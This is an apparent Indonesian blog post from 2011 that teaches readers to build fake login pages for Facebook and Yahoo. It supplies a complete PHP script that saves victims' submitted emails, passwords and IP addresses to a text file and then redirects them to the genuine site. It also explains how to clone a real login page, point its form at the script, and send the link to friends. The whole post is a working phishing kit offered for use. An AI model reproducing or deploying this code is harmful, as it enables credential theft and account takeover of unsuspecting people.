Bad Company UG

Minggu, 14 Agustus 2011

Script FAKE Login

Diposting oleh Unknown di 01.55 0 komentar
 
Banyak banget yang tanya sana sini, “Bagaimana seh membuat fake login?”. Mending kalo cuman itu, nanti yang lain tanya cara buat untuk Facebook, yang satu untuk Gmail, Yahoo, Blogger dan yah apa aja dah.
Pada prinsipnya sama aja, tinggal kita hanya mengganti beberapa perintah.
Penasaran?

Nah yang harus kita siapkan adalah 2 buah file yang bernama logs.php dan logs.txt (Terserah kalian lah mau kasih nama apa… ).
logs.php
?View Code PHP
<?php
$file = "logs.txt";
$username = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$today = date("F j, Y, g:i a");
 
$handle = fopen($file, 'a');
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "Email: ");
fwrite($handle, "$username");
fwrite($handle, "\n");
fwrite($handle, "Password: ");
fwrite($handle, "$password");
fwrite($handle, "\n");
fwrite($handle, "IP Address: ");
fwrite($handle, "$ip");
fwrite($handle, "\n");
fwrite($handle, "Date Submitted: ");
fwrite($handle, "$today");
fwrite($handle, "\n");
fwrite($handle, "++++++++++++++++++++++++++++++++++++++++++++++++++++");
fwrite($handle, "\n");
fwrite($handle, "\n");
fclose($handle);
echo "<script LANGUAGE=\"JavaScript\">
window.location=\"https://login.facebook.com/login.php?login_attempt=1\";
</script>";
?>
Perhatikan, untuk kedepannya yang perlu kalian ubah adalah perintah ini
?View Code PHP
$username = $_POST['email'];
$password = $_POST['pass'];
Dan ini…
?View Code JS
window.location=\"https://login.facebook.com/login.php?login_attempt=1\";
Dah inget aja itu dulu, ngerti belakangan aja… Sekarang target kita maunya apa? Facebook? Oke.
Buka Facebook dan liat source codenya / CTRL+U…
Fake Login Sesukamu
Yang perlu kalian cari adalah INPUT ID dari kedua TEXT FIELD berikut…
Fake Login Sesukamu
Kalo emang gak tau cara nyarinya, didalam text field tersebut kan ada tulisan Email dan Password. Copy aja dan coba search.
Fake Login Sesukamu
Done, ternyata untuk Email IDnya adalah email dan untuk Password IDnya pass. Buka logs.php dan ganti baris berikut.
?View Code PHP
$username = $_POST['email'];
$password = $_POST['pass'];
Nah pada contoh kali ini sudah sama yaitu email dan pass (ituloh yang ada di dalam $_POST). Kemudian pada baris
?View Code JS
window.location=\"https://login.facebook.com/login.php?login_attempt=1\";
Ganti URLnya jadi alamat asli atau alamat tempat sang korban ter-redirect ketika melakukan login pada Fake Login yang telah kita buat. Pada contoh kali ini adalah alamat asli login facebook.
Langkah selanjutnya adalah mengcopy seluruh source code facebook dan simpan di dalam index.php (buat dulu filenya.).
Gunakan fasilitas search dan cari kata form method dan liat action-nya.
?View Code HTML
<form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form">
Kalau di facebook form actionnya adalah “https://login.facebook.com/login.php?login_attempt=1” nah ganti menjadi logs.php.
Ingat, gak semua website memiliki 1 form action…Kadang ada yang punya lebih dari satu. Kalo facebook kan ada yang untuk login dan register.
Fake Login Sesukamu
Pokoknya teliti dan cari yang berhubungan sama LOGIN. Kemudian upload ketiga file tersebut dan kasih linknya ke teman kamu.
Belom ngerti juga?
Kalian harus ingat langkah – langkahnya yah…
1. Cari website yang mau dibuatin fake loginnya.
2. Cari INPUT ID dari TEXT FIELD atau tempat kita nulis email dan passwordnya.
3. Setelah dapet buka logs.php dan ganti pada bagian ini $_POST['email'];
4. Ganti juga bagian ini window.location=\”https://login.facebook.com/login.php?login_attempt=1\”; untuk me-redirect korban ketika melakukan login pada fake login kita (disarankan untuk me-redirect ke halaman login aslinya.
5. Copy keseluruhan source code dari website aslinya pada index.php dan cari form method yang berhubungan dengan login dan ganti actionnya menjadi logs.php.
6. Upload ketiga file tersebut, kasih linknya ke siapa saja dan tunggu hasilnya.
Fake Login Sesukamu
Sekarang mau target apa lagi? Yahoo? Boleh… Kita harus melakukannya sesuai langkah diatas.
Cari INPUT ID text field dari ID Yahoo!: dan Sandi:.
Fake Login Sesukamu
Ternyata untuk ID Yahoo! adalah username dan untuk Sandi adalah passwd.
Jangan lupa untuk mengcopy link asli dari Login Yahoo tersebut.
?View Code LINK
https://login.yahoo.com/config/mail?.src=ym&.intl=id
Buka logs.php dan ubah bagian berikut.
?View Code PHP
$username = $_POST['username'];
$password = $_POST['passwd'];
?View Code JS
window.location=\"https://login.yahoo.com/config/mail?.src=ym&.intl=id\";
Copy keseluruhan source code dari Yahoo dan paste ke index.php. Cari form methodnya dan ganti actionnya dari
?View Code ACTION
https://login.yahoo.com/config/login?
Menjadi
?View Code PHP
logs.php
Upload dan nikmati hasilnya…
Coba kalian terapkan sendiri sisanya dan semoga tutorial singkat dan gak jelas ini bisa berguna buat kalian semua…
DOWNLOAD
Label:

Leave a Reply

Langganan: Posting Komentar (Atom)